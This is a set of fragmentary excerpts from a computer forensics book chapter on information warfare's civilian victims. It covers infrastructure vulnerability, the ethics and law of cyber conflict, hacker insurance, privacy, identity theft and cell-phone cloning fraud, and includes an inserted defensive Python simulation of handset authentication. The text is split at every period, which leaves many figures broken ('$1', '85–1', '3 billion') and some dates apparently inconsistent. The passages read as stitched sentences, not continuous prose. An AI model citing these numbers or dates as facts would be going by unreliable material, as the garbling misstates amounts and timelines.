Accordingly, this infrastructure may now be considered to
represent an extension of national sovereignty, and any attacks on national information systems may be perceived as attacks on the nation itself
...
A further argument may be that the national security implications of information attacks make the defense against such attacks a military task
...
Most are presently not capable of operating in a hostile information environment
...
Again, most police forces are
incapable of defending against such attacks
...
Regardless of the capabilities of the various organizations, the
jurisdiction boundaries that separate civilian and military security responsibilities
are blurring as the Information Age evolves
...
Significant elements of
many of the information systems used by the world’s modern military forces are
designed, developed, and managed by civilians, primarily for civilian purposes, and
make extensive use of the civilian information infrastructure
...
The use of unique systems by military forces
for all of their information tasks is not economically viable
...
Likewise, an attack that is directed at a civilian user of an information system may inadvertently affect military users
...
Identifying the source of an information attack can be difficult, at times impossible, and can contribute to the problem of determining an appropriate response
...
Determining whether a nation, an individual, or a non-nation-state organization committed the IW attack may also be impossible, as may be ascertaining the
extent of any damage caused to civilians or refugees
...
Therefore, although distinguishing between a military information operation (MIO) and a civilian information operation (CIO) is highly desirable, and, from a legal viewpoint may be
essential, such distinction is often impossible
...
Securing a national information infrastructure presents unique challenges to national security
agencies and demands unique and innovative solutions
...
There is a strong argument for the development of a national information authority responsible for assuring the integrity of all national information systems, advising on the development of new information systems,
sponsoring research and development into information-assurance technologies,
and ultimately prosecuting information operations in support of diplomatic,
counter-criminal, and conflict-resolution objectives
...
Such an organization would not deny the individual elements of a nation’s armed
forces the right to develop their own information strategies; indeed, all the armed services have both a single-service and joint responsibility to develop robust information
strategies now
...
It is an option that should be considered by any government with a
genuine commitment to national security and the protection of its civilians
...
IW is defined as an attack on information systems for military advantage using
tactics of destruction, denial, exploitation, or deception
...
Current research is searching for robust solutions at each step in the information cycle, but the problem is systemic in that for every new solution, a new
threat is developed
...
The
most important enabling feature of the diffusion of information technology is declining cost
...
The IW threat will continue to grow at the expense of the cyber masses because
entry costs are low and decreasing, leading a large number of foreign governments
to organize strategic IW organizations within their military
...
Information systems are so critical to military operations that it is often more
effective to attack an opponent’s information systems than to concentrate on destroying its military forces directly
...
This has led to a reevaluation of military doctrine referred to as a
revolution in military affairs (RMA)
...
The United States is potentially vulnerable to IW attack because it is more dependent on information systems than any other country in the world
...
In a civilian context,
the quality of life of our most basic needs is dependent on automated information-management systems
...
In January 1997, the Defense Science Board within the
Pentagon released a task force report warning of U.S. vulnerability to an “electronic Pearl Harbor,” which puts the cyber masses at great risk with a lot to lose
...
The Pentagon already spends $8 billion a year to protect its information military systems
...
Eight critical national infrastructures were considered so vital that their incapacity or destruction
would have a debilitating effect on the defense and economic security of the United
States
...
In California’s Silicon Valley, large
Internet data centers have been blamed for stressing the region’s power grid beyond
what its Korean War–era design can handle
...
From a cybersecurity perspective, the electric power grids in the West are now
more fragile, and margins for error are significantly less
...
Civilian Casualties: The Victims and Refugees of Information Warfare
589
The recent power shortages come as the Critical Infrastructure Assurance Office
(CIAO) of the U.S. Department of Commerce delivered to Congress the first status
report on private-sector efforts to bolster cyberdefenses for systems that run critical
sectors of the economy
...
In the context of broader infrastructure assurance, the scale and complexities of
the energy infrastructure and their impact on infrastructure security and reliability
are not fully understood
...
Likewise, the sector continues to fall victim to poor personnel security practices,
ports, and services that are open to the Internet; outdated software without current
security patches; and improperly configured systems
...
For instance, if someone were to find a way to force the shutdown of a single power
plant or a section of the power grid, the results would be much more devastating,
because there is not enough reserve capacity to take up the slack
...
One risk with a situation
like this is that it exposes the flaws of the system to public scrutiny
...
Like it or
not, there are people in the world who pay attention to such revelations
...
It is recommended that companies, particularly utility companies, treat the power crisis as
a signal to begin stepping up network monitoring and security operations
...
Hackers smell weakness and a chance for their 15 minutes of fame
...
When a transmission system is stressed, the system operators and
security coordinators operate at a heightened level of alert so they can quickly
address and return the transmission system to normal from any situation that may
occur
...
This was the case decades ago, and
it is still true today
...
During the Cold War, the United States used a policy of strategic nuclear
deterrence, warning that any nation that attacked the United States could expect
total destruction in return
...
By analogy, analysts have wondered if a
similar strategy might deter IW attacks on the U.S. national information infrastructure (NII)
...
The identity of the perpetrator must be unambiguous
...
The perpetrator must have something of value at stake
...
This strategy of deterrence must be measured in the context of the inherent
vulnerability of large technologically based systems
...
The failure of a complex system may be exceptionally difficult to discover and
repair
...
It must be possible to determine if an event involving one of the United States’
vital infrastructures is the result of an accident, criminal attack, isolated terrorist incident, or an act of war
...
Possible jurisdictions
include private industry, the FBI/Department of Justice, CIA/National Security
Agency (NSA), or DoD; possible responses range from doing nothing to a nuclear
retaliatory strike
...
Many of the questions have been raised before in previous contexts, but the
unique characteristics of IW bring urgency to the search for new relevant answers
...
For example, in an IW analogy to the U.S. blockade of Cuba during the Cuban missile crisis, there are IW
techniques (jamming and denial-of-service attacks) that could be used to block
and, thus, isolate rogue nations from international communications without circumventing physical sovereignty—much in the same way the British decided to
sever all transatlantic telegraph cables that linked Germany to international communications at the outset of World War I
...
A state under international law
possesses sovereignty, which means that the state is the final arbiter of order within
its physical geographical borders
...
Internally, a state uses dominant force to
compel obedience to laws, and externally, a state interacts with other states, interaction in either friendly cooperation, competition, or to deter and defeat threats
...
This national information policy must also
include options that consider individuals or other non-state actors who might try
to provoke international conflicts
...
With IW, the state does not have a monopoly on
dominant force, nor can even the most powerful state reliably deter and defeat IW
attacks
...
With the advent of the Information
Age, the United States has lost the sanctuary that it has enjoyed for over 200 years
...
War is armed conflict between nation-states
...
The modern view of war provides a new look at
the tradition of a just war, jus ad bellum, (when it is right to resort to armed force)
and jus in bello, (what is right to do when using force)
...
It must be authorized by a competent authority
...
It must have a reasonable chance of success
...
The expected outcome must be peace
...
The application of just war reasoning to future IW conflicts is problematic, but there is a
growing voice saying there is a place for the use of force under national authority
in response to broader national security threats to the values and structures that define the international order
...
It is impossible to respond to every IW action, because there are too many
...
However, nothing in the charter impairs the inherent right of individual or collective self-defense if an armed attack occurs
...
Experts do not equate “use of force” with an “armed attack
...
On the other hand, Article 41 of the United Nations specifically states measures
that are not considered to be an armed attack: complete or partial interruption of
economic relations and of rail, sea, air, postal, telegraphic, radio, and other means
of communications
...
If data manipulation is such that the primary effects are indistinguishable from
conventional kinetic weapons, then IW may be considered an armed attack
...
What are the ethical implications of the blurring distinction between acts of
war from acts of espionage from acts of terrorism? Let’s take a look
...
An armed attack as stated in Article 51 contemplates
a traditional military attack using conventional weapons and does not include propaganda, information gathering, or economic sanctions
...
The threat analysis section of the 1997 Defense Science Board Report indicates
that a significant threat includes activities engaged on behalf of competitor states
...
In the age of multinational corporations that view
geographical boundaries and political nation-states as historical inconveniences,
should economic warfare between multinational corporations involve the military?
The new IW technologies make it difficult to distinguish between espionage
and war
...
During
peacetime, gaining entry to a computer’s internal operating system could be considered a criminal offense or act of espionage, despite the fact that the action in
question took place before the enemy had acquired ownership of the computer
...
Nonlethal most often refers to
immediate casualty counts, not downstream collateral effects
...
This weaponry includes sticky foam cannons, sonic cannons, and electromagnetic weapons— which effectively temporarily paralyze the enemy without
killing them
...
For instance, disabling the electronics of a fighter plane or air defense
radar during wartime is the goal of a large investment in electronic warfare equipment
by the United States and is considered fair and ethical
...
Is It Ethical to Set Expectations for a “Bloodless War” Based on IW?
As nonlethal weaponry of all types (especially IW weapons) advance from novelty
to norm many potential pitfalls will need to be faced
...
Nonlethal military capabilities are not new, although IW weapons are the newest
weapons in the nonlethal arsenal
...
As U.S. military forces are involved in missions that require extended direct contact with civilians (Somalia, Bosnia), force can no longer be viewed as either on or off, but rather
as a continuum with nonlethal weapons on one end and nuclear devices on the
other end
...
If IW weapons can be used
to remotely blind an opponent to incoming aircraft, disrupt logistics support, and
destroy or exploit an adversary’s communications, then many of the problems associated with the use of ground forces for these missions can be avoided
...
Because these technologies are potentially lethal in these circumstances, the term nonlethal has not been universally accepted within the U.S. military
...
Asserting that IW will ultimately allow future wars to be fought without casualties is a widespread misconception likely to prove counterproductive and even potentially dangerous to the cyber masses
...
Second, overselling of nonlethal capabilities without providing a context can lead to operational failures, deaths, and policy failure
...
There is a large asymmetry in global military power when comparing the
United States to other nation-states
...
This asymmetry makes
it unlikely another nation-state would challenge the United States in a direct high-technology conventional war, except in circumstances that cyber masses should not
depend on (incredible miscalculations or ignorant dictators, which were both present in the Gulf War)
...
These expectations go against two cardinal rules of military strategy: (1) you do not plan to
refight the previous war and (2) the future battlefields cannot be dictated by the
United States
...
Even in this scenario, military and civilian casualties will be likely from either primary or secondary
effects of IW attacks
...
The questions remain: is it ethically correct for
the United States to defend its security interests by resorting to the same IW tactics
that are used against it? Should information attacks be punished by information
counterattacks? The options include maintaining the United States’ superpower
status at all costs, covertly listening to their adversaries but not actively disrupting
operations, or contracting mercenaries, who are not officially affiliated with the
U.S. government, to do their dirty work
...
It is also harder to
predict secondary effects because of the globalization of systems
...
A nation-state or non-state actor that sponsors an attack
on the U.S. NII might lack an NII of their own for the United States to attack in
punishment and, thus, not be intimidated by a U.S. IW deterrence strategy
...
Every breach of
international law creates a duty to pay for loss or damages; nation-states may seek
recompense under “state responsibility doctrine
...
IW may violate
multiple international laws depending on the scenario, including the following:
UN Convention on Law of the Sea (prohibits unauthorized broadcasts from
the high seas)
International Telecommunications Convention of 1982 (requires nations to
avoid “harmful interference”)
INTELSAT Convention (satellite communications for nonmilitary purposes) [1]
INMARSAT (maritime satellite communications for “only peaceful purposes”)
Chicago Convention (refrain from endangering safety of flight)
According to DoD Policy Directive 5100
...
S
...
” The
problem is that there are no characterized rules of engagement for IW conflicts, which
can take the form of isolated operations, acts of retribution, or undeclared wars
...
Every breakthrough in offensive
technology eventually inspires a matching advance in defensive technology, thus escalating an IW weapons race
...
Given the uncertainty of deterrence and identifying the enemy, is the most ethical strategy for retaliation one that
attempts to separate the military from civilians and, in so doing, diminishes their
impact, which potentially prolongs the duration of the conflict, or a strategy that attempts to minimize lethality and duration but deliberately targets civilian systems?
Can Protection from IW Take Place in the
United States Given Our Democratic Rights?
How much government control of the U.S. NII is permissible in a free society? Most
of the IW technology is software, which is easy to replicate, hard to restrict, and dual-use by nature (having civilian and military uses)
...
This raises basic questions about the constitutional
and ethical balance between privacy [2] and national security in a new IW context
...
Most systems were
built to serve commercial users who will vehemently object to unfunded mandates
(taxes) and new requirements not driven by business demand (CLIPPER chip encryption and key escrow accounts)
...
If an IW attack
is detected and the enemy identified, but the United States is unable to react
promptly because of bureaucratic inefficiency or indifference from private industry, it may be too late to react at all
...
In a related matter that may provide a precedent,
the government has pledged to provide telephone companies with at least $1
...
THE DESTRUCTION OF PERSONAL ASSETS IN IWS
The Mounties always get their man—or, when it comes to hackers, their boy
...
His father was also nabbed, on unrelated charges of plotting to assault a business associate
...
He
was not what one would call a genius
...
While awaiting
trial, he could not enter any public space that hosts networked computers
...
com incident was part of a rash of denial-of-service attacks that crippled
Yahoo!, eBay, and other Internet titans, leading to a manhunt that stretched throughout the United States, Canada, and Germany
...
3 billion
...
If you’re a law enforcement organization,
it makes the crime look more serious
...
If you’re the press, it makes
the story more sensational
...
AIG, the largest commercial insurance underwriter in the United States, hopes the free on-site security check—which ordinarily
can cost tens of thousands of dollars—will encourage more companies to buy insurance coverage from it
...
9 billion in annual premiums by 2009
...
Insurance
industry officials indicate their business is doubling every 7 to 13 months, as worries
about hacking increase and more information technology professionals realize their
companies’ standard insurance policies don’t cover risks incurred by their Internet-based businesses
...
The cost of the insurance
application in the past included (for almost everyone) an on-site security assessment
that would cost upward of $60,000, regardless of whether you bought the insurance
...
The firms do external probes and
“ethical hacking” of a prospect’s Web site, as well as a three-day, on-site analysis to
determine what types of security problems the company faces
...
Although AIG’s
assessment is free, some competitors expressed skepticism
...
Security is not a product; it’s a process
...
Some policies only pay for risks associated with loss or misuse of intellectual
property
...
Premiums are generally based on a company’s revenue, as well as the type and
amount of coverage being sought
...
A package policy that covers a range of
risks, including liability, loss of revenue, errors and omissions, and virus protection,
can cost from $10,000 to $54,000 per year (or more) for each million dollars of coverage in the policy
...
Some policies cover only the amount of net income lost due to hacking
...
Numerous variables can affect premiums
...
For instance, a policy that begins
paying for business losses just four hours after a hacker shuts down a site may cost
more than a policy that begins paying after 24 hours of downtime
...
Companies can also get substantial discounts on their policies if they have managed service contracts with an insurer-certified security firm
...
Hacker insurance is
such a new product that there are no reliable actuarial tables to determine rates
...
For the companies seeking insurance, assessments should help them find (and immediately fix)
holes in their defense systems
...
Paul Companies, Lloyd’s of London, and Wurzler) are rolling out a fleet
of new products and alliances to help them gain market share
...
Wurzler has joined with Hewlett-Packard to market its products to a
select group of HP’s clients
...
Marsh & McClennan Companies, the world’s largest insurance brokerage, is selling insurance provided by AIG, Chubb, and Lloyd’s
...
Counterpane Internet Security has allied with brokers Safeonline and Frank Crystal & Co
...
It’s a wildly growing market, and its primary underwriters are AIG, Fidelity and
Deposit, and Wurzler
...
Well, now e-commerce has hit
...
A survey conducted in 2004 by the
FBI and the Computer Security Institute, an association of computer security personnel from the private and public sectors, found that from March 2002 to March
2003, 32% of the 1,085 governmental agencies and businesses that responded indicated that they experienced denial-of-service attacks
...
Losses from 2000’s “Love Bug” virus were estimated to be as high as $20 billion
...
Security analysts hope it
will encourage more Net companies to get insurance coverage
...
Anything Internet-facing is a point of vulnerability
...
There’s real exposure
and liability
...
Pricing cyberintrusions is pretty much a guessing game
...
6 billion figure associated with recent attacks, calculated by the Yankee Group, includes the expense
of security upgrades, consulting fees, and losses in market capitalization from tumbling stock prices
...
That’s like saying you don’t need to get a lock for your
front door unless somebody breaks in
...
A formula should be devised to calculate the
severity of hacks
...
In one famous case, an editor at the computer-security webzine Phrack was
charged with publishing a document stolen from BellSouth’s network
...
” It
was revealed at trial, however, that BellSouth sold a nearly identical document to
the public for just $14 per copy
...
The
study, released by the San Francisco–based Computer Security Institute (CSI) and
the San Francisco FBI Computer Intrusion Squad, found that 95% of survey respondents detected some form of security breach in 2003
...
This figure, up from 67% in 2001, didn’t include data from common
security problems caused by computer viruses, laptop theft, and abuse of Internet
access by employees
...
The figures are based on responses from 1,087 computer security practitioners in 617 U.S. corporations, government agencies, financial institutions, medical institutions, and universities
...
Eighty
respondents reported $100
...
CSI indicates a continuing trend in the study—that computer security threats
to large corporations and government agencies come from both inside and outside
the organization
...
Sixty-five respondents indicated that they suffered $51 million in damages from sabotage of data or
networks, compared to a combined total of $65 million for previous years
...
The short- and long-term personal economic impact on cyber
citizens continues to be staggering
...
The private sector
and government organizations must increase their focus on sound security practices, deployment of sophisticated defensive technology, and adequate training and
staffing of security managers
...
Not America Online,
which promises never to disclose information about members to “outside companies
...
The biggest collectors of information, it seems, are suddenly in the forefront of the campaign for our right to be left alone
...
True, millions of Americans are wary of the Internet, and surveys suggest that many
are hanging back because of confidentiality concerns
...
It’s also about fending off legislation
...
In particular, businesses are disturbed by one likely element of such a law: a subject access provision
that would allow citizens to find out what companies know about them and how
the information is being used
...
The technological costs, however, could be exceeded by the psychological costs
...
People are going to be horrified
...
The confidentiality
of video rentals is protected, for example, because a reporter got hold of Robert
Bork’s rental records during the fight over his failed nomination to the Supreme
Court
...
The market can do the job
...
That
premise, however, is under mounting attack on two fronts, domestic and foreign
...
A European Union (EU)
privacy directive that took effect in October 2004 not only includes subject access
but also requires that, when soliciting information from people, companies clearly
spell out what they intend to do with it
...
Accustomed to collecting data for hazy purposes (a “personalized
experience”), businesses reserve the right to discover more specific uses or sell the
information later on
...
The Sabre Group, a Texas-based airline-reservation network, is fighting in Swedish court for the right to maintain in its global data bank such facts as a passenger’s wheelchair use or preference for kosher meals
...
” The Europeans have gone to ridiculous extremes, creating privacy commissions and “privacy czars” to deal with such trivialities as L.L. Bean’s decision to send out a catalog of their home products as opposed to their clothing products
...
Double Standard
Such fears are overwrought, but European officials point to deep historical reasons
(including Nazism) for their view of privacy as a basic human right
...
But if Washington has to make concessions, U.S. multinationals could find themselves in the ticklish position of explaining why they have granted rights to Europeans that they are trying to withhold from Americans
...
In 1999, Microsoft was discovered to be collecting data
on users who had expressly requested anonymity
...
Online privacy protection has the potential to become a significant industry in itself, but it will grow much faster with legal incentives
...
Oddly enough, the concept of subject access originated in the United States,
with the Fair Credit Reporting Act of 1971
...
Many of the same companies that have been battling against a federal privacy
law have pressed Congress to enact more stringent copyright and patent laws
...
604
Computer Forensics, Second Edition
THE INDIVIDUAL EXPOSED
On the Internet, goes the saying, nobody knows you’re a dog
...
The Internet is now
more like an unlocked diary, with millions of consumers divulging marketable details of their personal lives, from where they live to what they eat for dinner
...
Software tracks the sites you visit and the pages that catch your eye
...
No one is immune
...
“Spammers” cram your email inbox with ads
...
Businesses recognize the Web’s potential as a shopping mall, but because of
concern over consumer privacy, many stores in that shopping mall have been
forced out of business
...
In a recent survey by the Boston Consulting Group, more than 77% of online users worried more about offering up private facts online than they did via phone or
mail—so they often refused or gave false information
...
Congress is examining the issue, too; several measures to govern the use and sale of personal
data, such as Social Security numbers, are pending
...
After all, a pro-consumer stance is good for business
...
Of course, you can avoid keying in anything you consider private, but that
would bar you from using quite a few sites, and abstinence is not always foolproof
...
Even
companies that advertise there can drop cookies on your hard drive without your
knowledge; some expire only after 2005
...
Surfing through
the Anonymizer hides your identity but slows you down to some degree
...
Many shareware programs, which can be tried out
before being purchased, can help you manage cookies (you might want to permit
cookies from a personalized news product, for example) or cut them out entirely
...
Résumé banks, professional directories, alumni registries,
and news archives can all be harvested, as well
...
The Delaware State Police
nabbed a couple recently who had obtained birth certificates and drivers’ licenses in
others’ names (thus enabling them to open bank accounts and get credit cards)
using information gleaned from sources that included the Internet
...
Eight major reference services announced an agreement at the FTC workshop
to prevent the misuse of nonpublic data, such as the name, address, and Social Security number found at the top of a credit report
...
The Fair Credit Reporting Act restricts dissemination of data in the body of a
credit report (such as credit card accounts, car loans, or mortgages), but does not
cover the material at the top
...
That raises questions about the quality of the data
...
Privacy
advocates say consumers should be told if any personal facts are being sold and
should have the right to dispute errors in the databases
...
Privacy advocates also argue that consumers should be able to opt out of junk
email, or spam
...
Although all major online services and ISPs prohibit spamming and use filtering programs to weed it out (several have won injunctions barring spammers from their networks), the filters don’t always work
...
The FTC recently vowed to prosecute perpetrators of fraud and deception, soliciting the assistance of the Internet E-Mail Marketing Council
...
If that
does not happen, the FTC will consider taking stronger steps to enable people to
browse and buy confidently as if they were shopping at the local mall
...
And that’s just the beginning
...
After all,
the couple, who live in Kansas City, Kansas, were refinancing with their existing
mortgage lender and they prided themselves on their credit history
...
It turns out that a woman in Illinois had applied for credit 55 times using
Helus’s name and Social Security number
...
The perpetrator torched her credit
to the point where even the perpetrator herself was denied
...
It happens when
one individual uses another’s personal identification (name, address, Social Security number, date of birth, mother’s maiden name) to take over or open new credit
cards and bank accounts, apply for car and house loans, lease cars and apartments,
and even take out insurance
...
Meanwhile, the proliferation of black marks on a credit report can be devastating
...
Some run into trouble
applying for a job
...
Many identity thieves use stolen personal information to obtain driver’s licenses, birth certificates, and professional licenses, making it easier to get credit
...
Data have been
stolen from desk drawers in the workplace, mailboxes, job application forms, and
the Internet
...
Thieves typically have the bills
sent to an address that is not the victim’s, concealing the scheme for months, even
years
...
In the 1980s, criminals who wanted free plastic simply made up counterfeit
credit cards with the correct number of digits
...
Now
criminals are taking advantage of what some see as the weakest link in the credit
system: personal identity
...
Personal identifiers are now, more than ever, a
valuable commodity to criminals
...
Trans Union, for example,
one of the three major credit bureaus, indicates three-fourths of all consumer inquiries
relate to identity fraud
...
The costs of identity fraud can be very high: the Secret Service indicates losses to victims and institutions in its identity-fraud investigations were $5.8 billion in 2000
...
Most victims call the police, but in states with no statute, some police departments refuse to take a report because the law sees the victim in a case of identity
fraud as the party that granted the credit (the bank or the merchant, for example),
not the person impersonated
...
Victims need proof because the attitude they often encounter when dealing
with creditors is guilty, guilty, guilty
...
That really aggravates Comfort, who has already been turned down for a mortgage
...
They have to do all the footwork themselves
...
Some require much more: one collection agency
told Helus it needed a copy of her driver’s license, her Social Security card, her birth
certificate, and any lease or mortgage contract from the past five years—all for an
$87 cable bill
...
As with many victims of identity theft, sensitive documents were the last thing she
wanted to send to a stranger
...
Many creditors
do not take the proper steps to verify the identity of the credit applicant
...
The application was preprinted with the impostor’s name and address, but the impostor crossed off her own name (leaving her address) and wrote in Haskins’ name, Social Security number, and occupation
...
All the
banks have systems that detect fraud
...
To make matters worse, two weeks after Haskins notified the bank that the account was fraudulent, the bank sold it to a collection agency, and she and her children
started receiving threatening phone calls and letters
...
The card triggered an avalanche of preapproved credit offers to the phony Haskins mailbox: one different address on a credit account was all it had taken for one of the credit bureaus to switch Haskins’ credit-file address to the impostor’s
...
Some credit bureaus won’t change a file address until three creditors report a new address, but a criminal on a spree can quickly cross that threshold
...
The credit bureau says contact the creditor, the creditor says contact the credit bureau, and the consumer just
gets ping-ponged back and forth
...
The letter did not say which of the 25 accounts it referred to
...
This notifies anyone who pulls the
report that the subject is a victim of fraud and that he or she should be called to verify any credit application
...
Credit bureaus might want to step up their efforts at finding a solution before
more aggrieved consumers turn to the courts
...
The award: $7
...
Meanwhile, the credit-reporting industry has formed a taskforce to tackle identity theft
...
Individual creditors
are also taking steps to stem their losses and prevent future ones
...
That’s how Irene Cole (name changed to protect privacy) of San Francisco found out her identity had been compromised
...
Civilian Casualties: The Victims and Refugees of Information Warfare
609
Identity theft is a crime that comes back to haunt its victims, and many are taking determined measures to prevent its recurrence
...
To her way of thinking, safeguarding her children’s identity is far more valuable
...
After all, who cares if someone overhears you telling your
husband or wife you’re stuck in traffic
...
Cellular service providers have a different security problem
...
In the early days of cellular telephony, service theft mostly meant
cloning
...
That problem has been reduced by almost two orders of magnitude
through the application of some thoughtful technology, but it has been replaced by
other problems: subscription fraud (the same problem that bedevils issuers of
credit cards) and the misapplication of service provider subsidies on handsets
...
Subsidy fraud involves taking a phone whose cost has
been heavily subsidized by a cellular carrier and activating it on a different carrier’s
network
...
However, the newest and best of them cannot be implemented on old handsets, so the technical situation is not without interest
...
On the
one hand, many of them need the revenue stream from a large number of subscribers to help them pay off the huge investments they made when they bid wildly
for spectrum space back in 1995
...
As the practice of conducting serious business over the Internet continues to
grow, other security issues will arise
...
The
technical solutions to be discussed here, such as radio frequency (RF) fingerprinting and authentication, do a good job of guaranteeing that the handset is what it
claims to be, but they guarantee nothing about the person using it
...
The problem, in
fact, is not finding solutions, but getting everyone to agree on which to use
...
The phone companies, as an industry,
must standardize that solution to drive mass-market end-user accessibility
...
Analog phones are
easy to bug; digital are hard
...
85–1
...
93–1
...
Moreover, it is hardly rocket science to modify a new, compliant receiver to add the extra bands
...
Lest anyone think that analog cellular telephony is an old, dead technology, as
of June 2002, over 40% of the subscribers in the United States still used analog
handsets, according to Boston’s Yankee Group
...
The latest figures from the Cellular Telecommunications Industry Association
(CTIA), indicate merely that digital penetration today exceeds 80% but the CTIA
counts dual-mode handsets as digital, so its number may not be so different from
the Yankee Group’s
...
Digital phones, be they of the time- or code-division multiple-access (TDMA
or CDMA) variety, are, unlike analog units, foolproof against eavesdropping by ordinary mortals
...
For
TDMA, what can be snatched out of the ether is a digital data stream representing
one side of each of three multiplexed conversations
...
In the case of CDMA, what they wind up with is an even thornier problem—a
mishmash of half a dozen conversations, each modulated by a different pseudorandom code, all occupying the same band
...
Plus, in digital
systems, voice is vocoded
...
As
before, someone interested in decompressing it needs to know the compression algorithm used
...
Small wonder that
none of the system operators or phone manufacturers regard eavesdropping on
digital cell phones as a problem
...
Conceived in innocence, early analog phones were almost comically vulnerable to security attacks
...
To program those numbers into another handset is the work of a
minute, and behold, another cloned phone is ready for use
...
Working with the U.S. Secret Service, they persuaded Congress in 1998 to amend the law pertaining to “fraud and related activity in connection with access devices” (Title 18, Section 1029, of the U.S. Code), so as to make it a federal crime to own a scanning receiver or a cell-phone programmer with intent to defraud
...
The law is serious, specifying maximum prison terms of 10 or 15 years (for
first-time offenders), depending on the exact nature of the crime
...
PINs certainly
made it tougher for thieves to use stolen phones, but because the PINs were transmitted in the clear, they were not very effective against cloning
...
The technology involves measuring several (unspecified) parameters associated with RF signals and characterizing them (again, in a proprietary manner) to produce a signature unique to the
transmitter being studied
...
Authentication Secrets
With the advent of digital and more advanced analog phones, an even more effective fraud-fighting technology came into use: authentication
...
Every time a call is made, the network sends the handset a random number, which the handset then combines with its secret number using an algorithm designed for the task
...
If the numbers match, the call is
completed; if not, it is not
...
If the input numbers are
off by even a single bit, the resulting number will not even be close to the right answer
...
This is not
to suggest that sophisticated code crackers could not do it (the experts at the NSA
would probably consider it a warm-up exercise), but even high-level criminals
rarely have access to the required expertise or equipment
...
Eighty-three percent of narcotics dealers arrested in 2001 were found to be in possession of cloned phones, according to testimony from the Drug Enforcement Administration
...
Like authentication, it requires a phone capable of performing its part of the process
...
Those numbers are compared
whenever a call is made
...
Obviously, if
someone has cloned a phone, then both he or she and the legitimate users will be
making calls, so the network will have their combined number, whereas each handset will have only its own
...
Cloning fraud has dropped about 99% over the past four to five years
...
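The two fraud-fighting mechanisms just described, the challenge-response authentication and the call-count comparison, as an added illustration that is not the book’s own code nor any carrier’s actual scheme. The page does not name the handset algorithm, so HMAC-SHA256 stands in for the “algorithm designed for the task”; the subscriber number, the secret, the handset objects and the call outcomes are all constructed for the example. It shows that a clone which copied only the over-the-air identifiers fails the challenge, that flipping one bit of the secret changes roughly half the bits of the response, and that once a second device is making calls on the same number the network’s combined count no longer matches either handset’s own count:

```python
import hmac
import secrets
from typing import Dict, Optional

# Assumption: HMAC-SHA256 stands in for the unnamed handset algorithm. The shared
# secret is provisioned into both handset and network and is never sent over the air.
ALGO = "sha256"


def handset_response(secret: bytes, challenge: bytes) -> bytes:
    """The handset combines the network's random number with its secret."""
    return hmac.new(secret, challenge, ALGO).digest()


def differing_bits(a: bytes, b: bytes) -> int:
    """Hamming distance between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def single_bit_sensitivity() -> int:
    """Responses for the same challenge from two secrets that differ in one bit."""
    secret = bytes(16)                                   # constructed secret
    flipped = bytes([secret[0] ^ 0x01]) + secret[1:]     # one bit changed
    challenge = b"fixed challenge!"                      # constructed 16-byte challenge
    return differing_bits(handset_response(secret, challenge),
                          handset_response(flipped, challenge))


class Network:
    """Per subscriber the network holds the secret and the number of calls it has
    completed on that number: the 'combined number' of the text, because calls from a
    clone and from the genuine handset are both counted here."""

    def __init__(self) -> None:
        self.subscribers: Dict[str, dict] = {}

    def provision(self, number: str, secret: bytes) -> None:
        self.subscribers[number] = {"secret": secret, "calls": 0}

    def new_challenge(self) -> bytes:
        return secrets.token_bytes(16)  # the random number sent to the handset

    def call_setup(self, number: str, challenge: bytes,
                   response: bytes, handset_count: int) -> str:
        rec = self.subscribers[number]
        expected = handset_response(rec["secret"], challenge)
        if not hmac.compare_digest(expected, response):
            return "rejected: authentication"
        if handset_count != rec["calls"]:
            return "rejected: call count"
        rec["calls"] += 1
        return "completed"


class Handset:
    """A handset knows its number, its secret (None for a clone that copied only the
    identifiers sent over the air) and its own count of completed calls."""

    def __init__(self, number: str, secret: Optional[bytes]) -> None:
        self.number, self.secret, self.calls = number, secret, 0

    def place_call(self, net: Network) -> str:
        challenge = net.new_challenge()
        response = handset_response(self.secret or b"", challenge)
        outcome = net.call_setup(self.number, challenge, response, self.calls)
        if outcome == "completed":
            self.calls += 1
        return outcome


def simulate() -> Dict[str, str]:
    """Constructed scenario: a clone without the secret, a clone that somehow holds the
    secret but has no record of the genuine handset's calls, and the genuine handset."""
    net = Network()
    secret = secrets.token_bytes(16)
    net.provision("555-0100", secret)               # constructed subscriber number
    genuine = Handset("555-0100", secret)
    clone_no_secret = Handset("555-0100", None)
    clone_with_secret = Handset("555-0100", secret)
    results = {}
    # wrong response: the challenge defeats a clone that lacks the secret
    results["clone_no_secret"] = clone_no_secret.place_call(net)
    # counts agree (0 == 0), so a secret-holding clone gets one call through...
    results["clone_with_secret"] = clone_with_secret.place_call(net)
    # ...but now the network holds 1 and the genuine handset 0: the mismatch flags cloning
    results["genuine"] = genuine.place_call(net)
    return results


if __name__ == "__main__":
    for step, outcome in simulate().items():
        print(f"{step:18s} {outcome}")
    print("bits changed by a one-bit secret change:", single_bit_sensitivity())
```

The count check deliberately rejects whichever device calls next after the counts diverge; in practice that rejection is the signal to contact the subscriber, since it cannot tell the genuine handset from the clone on its own.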
Subscriber Fraud
Criminals, like electrons, tend to take the path of least resistance
...
In the case of
cell phones (or, more accurately, cell-phone service), the defenses in place against
cloning have motivated criminals to adopt the various techniques used by credit
card thieves, which are all lumped together under the rubric of subscriber fraud
...
As the law now stands, it is a federal crime merely to steal someone’s identity information with intent to defraud
...
The industry became particularly susceptible to subscriber fraud when it started
pursuing new customers through such nontraditional channels as telemarketing and
the Internet
...
Now companies are finding they will have to get
back to the basics if they are to keep subscriber fraud losses at a tolerable level
...
Therefore, methods must be developed
for screening out bad risks without turning off legitimate customers
...
One thing computers are
being used to do is keep track of subscriber calling patterns—the numbers they
tend to call or receive calls from
...
Subsidy Loss
A major problem, especially in Latin America, is cell phones moving sideways
through the distribution channels
...
What sometimes
happens is that the phones wind up being activated on some other carrier’s network
...
In Latin America, that dealer
may not even be in the same country as the distributor
...
As with subscriber fraud, the remedy is mostly a matter of running a tighter
ship, but some sort of technological fix will also be developed, which can be described as an authentication kind of approach for the activation process
...
THE NEW ORDER AND STATE MEDICAL ID CARDS
The recent hacking of 9,000 administrative patient files from one of the country’s top hospitals underscores the lack of firm, clear, universal standards to ensure the security of online medical records
...
In an attempt to remedy the situation, the U.S. government is finalizing and releasing the security and privacy portions of the Health Insurance Portability and Accountability Act (HIPAA), which will define interface and security standards and policies
...
Bumpy Road Ahead
The industry still has a long way to go
...
A lot
of it is onerous and expensive, and a lot of it hard to interpret (see sidebar, “New
Medical Privacy Rules”)
...
